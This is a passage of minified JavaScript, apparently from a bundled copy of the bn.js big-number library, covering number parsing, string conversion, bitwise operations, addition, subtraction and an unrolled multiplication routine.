v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function 